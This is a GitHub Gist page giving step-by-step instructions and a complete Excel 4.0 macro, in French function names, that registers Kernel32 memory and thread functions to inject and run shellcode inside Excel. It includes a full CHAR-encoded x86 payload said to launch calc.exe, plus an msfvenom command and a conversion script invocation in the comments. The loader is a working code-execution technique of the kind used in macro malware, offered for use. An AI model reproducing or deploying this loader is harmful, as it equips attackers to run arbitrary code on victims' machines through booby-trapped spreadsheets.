Last active
May 13, 2023 23:22
-
-
Save Arno0x/17d1705ecfc945088579c84994a652d3 to your computer and use it in GitHub Desktop.
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL | |
| 1. Open Excel | |
| 2. Click on the active tab | |
| 3. Select "Insérer" | |
| 4. Click on "Macro MS Excel 4.0". | |
| 5. This will create a new worksheet called "Macro1" | |
| ================================================================================ | |
| In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1: | |
| ================================================================================ | |
| =REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9) | |
| =REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9) | |
| =REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9) | |
| =VAlloc(0;4096;4096;64) | |
| =SELECTIONNER(B1:B50;B1) | |
| =POSER.VALEUR(C1;0) | |
| =TANT.QUE(CELLULE.ACTIVE()<>"END") | |
| =POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE())) | |
| =WProcessMemory(-1; A4 + (C1 * 255); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0) | |
| =POSER.VALEUR(C1; C1 +1) | |
| =SELECTIONNER(;"L(1)C") | |
| =SUIVANT() | |
| =CThread(0;0;A4;0;0;0) | |
| =ARRETER() | |
| ================================================================================ | |
| In the Macro1 worksheet, paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe): | |
| ================================================================================ | |
| =CAR(217)&CAR(238)&CAR(184)&CAR(239)&CAR(216)&CAR(65)&CAR(149)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(95)&CAR(49)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(199)&CAR(4)&CAR(49)&CAR(71)&CAR(20)&CAR(3)&CAR(71)&CAR(251)&CAR(58)&CAR(180)&CAR(105)&CAR(235)&CAR(57)&CAR(55)&CAR(146)&CAR(235)&CAR(93)&CAR(177)&CAR(119)&CAR(218)&CAR(93)&CAR(165)&CAR(252)&CAR(76)&CAR(110)&CAR(173)&CAR(81)&CAR(96)&CAR(5)&CAR(227)&CAR(65)&CAR(243)&CAR(107)&CAR(44)&CAR(101)&CAR(180)&CAR(198)&CAR(10)&CAR(72)&CAR(69)&CAR(122)&CAR(110)&CAR(203)&CAR(197)&CAR(129)&CAR(163)&CAR(43)&CAR(244)&CAR(73)&CAR(182)&CAR(42)&CAR(49)&CAR(183)&CAR(59)&CAR(126)&CAR(234)&CAR(179)&CAR(238)&CAR(111)&CAR(159)&CAR(142)&CAR(50)&CAR(27)&CAR(211)&CAR(31)&CAR(51)&CAR(248)&CAR(163)&CAR(30)&CAR(18)&CAR(175)&CAR(184)&CAR(120)&CAR(180)&CAR(81)&CAR(109)&CAR(241)&CAR(253)&CAR(73)&CAR(114)&CAR(60)&CAR(183)&CAR(226)&CAR(64)&CAR(202)&CAR(70)&CAR(35)&CAR(153)&CAR(51)&CAR(228)&CAR(10)&CAR(22)&CAR(198)&CAR(244)&CAR(75)&CAR(144)&CAR(57)&CAR(131)&CAR(165)&CAR(227)&CAR(196)&CAR(148)&CAR(113)&CAR(158)&CAR(18)&CAR(16)&CAR(98)&CAR(56)&CAR(208)&CAR(130)&CAR(78)&CAR(185)&CAR(53)&CAR(84)&CAR(4)&CAR(181)&CAR(242)&CAR(18)&CAR(66)&CAR(217)&CAR(5)&CAR(246)&CAR(248)&CAR(229)&CAR(142)&CAR(249)&CAR(46)&CAR(108)&CAR(212)&CAR(221)&CAR(234)&CAR(53)&CAR(142)&CAR(124)&CAR(170)&CAR(147)&CAR(97)&CAR(128)&CAR(172)&CAR(124)&CAR(221)&CAR(36)&CAR(166)&CAR(144)&CAR(10)&CAR(85)&CAR(229)&CAR(254)&CAR(205)&CAR(235)&CAR(147)&CAR(76)&CAR(205)&CAR(243)&CAR(155)&CAR(224)&CAR(166)&CAR(194)&CAR(16)&CAR(111)&CAR(176)&CAR(218)&CAR(242)&CAR(212)&CAR(78)&CAR(145)&CAR(95)&CAR(124)&CAR(199)&CAR(124)&CAR(10)&CAR(61)&CAR(138)&CAR(126)&CAR(224)&CAR(1)&CAR(179)&CAR(252)&CAR(1)&CAR(249)&CAR(64)&CAR(28)&CAR(96)&CAR(252)&CAR(13)&CAR(154)&CAR(152)&CAR(140)&CAR(30)&CAR(79)&CAR(159)&CAR(35)&CAR(30)&CAR(90)&CAR(252)&CAR(162)&CAR(140)&CAR(6)&CAR(45)&CAR(65)&CAR(53)&CAR(172)&CAR(49) | |
| END |
msfvenom, from the metasploit framework, for the shellcode payload generation, beware you have to avoid '0', so something like this:
msfvenom -a x86 -p windows/exec -f raw cmd=calc.exe -b '\00' > shellcode.bin- Then you can use my tranformFile.py script to transform this shellcode into a list of CHAR (or CAR in french MS-Office): transformFile.py:
./transformFile.py -i shellcode.bin -f xlm
Hello @Arno0x
I get an error.
python3 transformFile.py -i shellcode.bin -f xlm
File "transformFile.py", line 166
if string.strip().startswith("[!]"):
^
TabError: inconsistent use of tabs and spaces in indentation
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Noob question. How did you generate the shellcode?